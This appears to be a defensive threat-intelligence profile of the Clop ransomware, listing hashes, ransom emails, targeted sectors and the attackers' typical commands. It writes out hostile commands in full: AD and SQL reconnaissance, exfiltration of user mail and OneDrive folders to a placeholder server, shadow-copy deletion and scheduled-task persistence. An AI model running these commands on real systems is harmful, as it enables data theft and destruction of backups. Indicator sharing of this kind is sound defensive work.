Clop Ransomeware:
Clop Ransomeware is spreading via executables with legitimate digital signatures and is targeting entire networks instead of individual users.
Country of Origin: Russia
Appended File Extension:
- [.]Clop
Top Affected Countries:
- USA
- Spain
- India
Top Affected Industries:
- Healthcare
- Financial
- Media
Gang Name: Silence
IOCs: (MD5 Hashes)
- 0403DB9FCB37BD8CEEC0AFD6C3754314
- 160FD326A825271E9BD71653BA6F3EE1
- 227A9F4931342F8B49CB3044F66DBF05
- 25E11A9EBDE8D2CC26084E3C739273A7
- 279F5BEEE9D4BF8C54026E78ACBA61B1
- 35792C5501760071D461E9455AA50730
- 3FE02FDD243979106F6D91AE2DF8CCFF
- 569D3ED52F17B12729CEF26018C81FB9
- 72A76CA18B85E64A8C655C94BE087C5E
- 738314AA6E07F9A625E4774AC1243A79
- 73FBFBB0FB34E2696E5F3D9A9D2F6D46
- 949670DCDED69C76760D87F2271E0631
- A09CE9363467F0CDD72714945CF0BF3A
- A93B3DAA9460C64C631AD076D8ED126E
- AE0C9765CC0BC9F4D2ED8970FF77A8D1
- AE5CB860F043CAA84BF4E11CEC758616
- B7FD25034019BC0B09242047D2C1D62A
- C41A0E1DDEB85B6326A3DC403A5FD0FA
- D8DF0EEE17FA5A361E26D67C43E10F28
- ED7DB8C2256B2D5F36B3D9C349A6ED0B
Emails:
- servicedigilogos[at]protonmail[.]com
- managersmaers[at]tutanota[.]com
- unlock[at]goldenbay[.]su
- unlock[at]graylegion[.]su
- unlock[at]eqaltech[.]su
- unlock[at]royalmail[.]su
- kensgilbomet[at]protonmail[.]com
URLs:
N/A
IPs:
N/A
Commands Used Mostly:
adfind.exe -f &(objectcategory=computer) operatingsystem -csv
adfind -f objectcategory=person samaccountname name displayname givenname department description title mail logoncount -csv
adfind.exe -h <redacted> -f &(objectcategory=computer) operatingsystem samaccountname name displayname givenname department description title mail logoncount -csv
sqlcmd -q select name from sys.databases
sqlcmd -s <hostname> -q select name from sys.databases
sqlcmd -s <hostname> -q set nocount on; select table_name from information_schema.tables where table_type = 'base table' -h -1 -w -e -d cct_db
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads
C:\Windows\System32\wbem\WMIC.exe shadowcopy where ID=<redacted> delete
C:\windows\WinCDropQSysvolY.exe
C:\windows\WinCDropQSysvolY.exe runrun
schtasks.exe /create /tn OneDrvTest /tr C:\windows\SysZDropQLogonQ.exe /s
<redacted> /sc onstart /ru system /f
schtasks.exe /run /tn OneDrvTest /s <redacted>